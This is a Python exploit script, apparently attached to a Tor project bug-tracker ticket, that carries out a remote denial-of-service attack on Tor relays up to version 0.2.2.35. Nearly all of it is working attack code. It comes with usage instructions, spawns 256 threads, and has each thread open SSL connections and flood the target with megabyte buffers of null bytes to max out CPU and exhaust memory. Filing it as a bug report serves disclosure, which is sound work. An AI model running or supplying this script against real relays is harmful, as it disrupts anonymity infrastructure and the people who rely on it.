Ticket #5934: tor_relay_denial_of_service.txt

File tor_relay_denial_of_service.txt, 2.2 KB (added by runa, 8 years ago)
Line 
1#!/usr/bin/python
2# Exploit Title:        Tor relay remote denial of service
3# Date:                 12-04-2012
4# Software link:        https://www.torproject.org/
5# Version:              <= 0.2.2.35
6# Tested on:            Linux
7#
8# This code has 2 effects :
9#  - Imediatly incrase the CPU usage of the server to ~ 100 %
10#  - Hudge memory usage, if the ratio bandwich / RAM is higth this code can make Tor use all the avaiable memory and crash (works great on 127.0.0.1)
11#
12# Usage:        python exploit.py host port
13# Exemple:      python exploit.py localhost 9001
14
15import socket, ssl
16import time
17import os
18import threading
19import sys
20import random
21
22if len(sys.argv) != 3 or not sys.argv[2].isdigit():
23    sys.stderr.write(" Usage : " + sys.argv[0] + " host port\n")
24    os._exit(-1)
25
26t0 = time.time()
27buff = chr(0) * 1000000
28
29target = (sys.argv[1], int(sys.argv[2]))
30
31error = 0
32
33class   Error:
34    def __init__(self):
35        self.count = 0
36        self.lock = threading.Lock()
37
38    def error(self, msg, pound):
39        self.lock.acquire()
40        print " [!] Error : " + msg
41        self.count += pound
42        if self.count > 42:
43            print " [!] Too many errors ! (Server may be down)"
44            print " [+] Exiting ..."
45            os._exit(0)
46        self.lock.release()
47
48def     flood(target, err):
49    while True:
50        try:
51            try:
52                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
53                sock.connect(target)
54                ssl_sock = ssl.wrap_socket(sock)
55                ssl_sock.do_handshake()
56            except:
57                err.error("Can not connect", 1)
58            while True:
59                ssl_sock.sendall(buff) # Yes, we just send ssl-zipped 0x00 ...
60        except:
61            err.error("Socket reset (server timeout)", 0)
62
63threads = []
64err = Error()
65for i in range(256):
66    print " [+] starting a new thread"
67    threads.append(threading.Thread(target = flood, args = [target, err]))
68    threads[i].start()
69    if i < 20:
70        time.sleep(1)
71    elif i < 128:
72        time.sleep(3 + random.random())
73    else:
74        time.sleep(7 + random.random())